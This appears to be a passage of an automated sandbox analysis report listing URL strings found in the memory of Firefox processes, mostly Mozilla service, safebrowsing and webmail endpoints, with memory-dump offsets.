Source: firefox.exe, 00000018.00000002.2822642036.000002BA5A07A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%resource://gre/modules/compone
Source: firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000018.00000003.2733288614.000002BA5C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56BD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2804720273.000002BA56D1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.inbox
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49CD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C5372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A786000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 00000018.00000002.2797999061.000002BA55DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sresource://pdf.js/PdfJsDefaultPreferences.sys
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000018.00000002.2832858012.000002BA5AC03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA5964A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/_startedLoadSinceLastUserTyping
Source: firefox.exe, 00000018.00000002.2837480713.000002BA5ADEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000018.00000002.2832858012.000002BA5AC03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000018.00000002.2832858012.000002BA5AC03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA5964A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B580000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B852000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: ae5cfd188c.exe, 00000007.00000003.2497811681.000000000564E000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631088178.000000000546E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
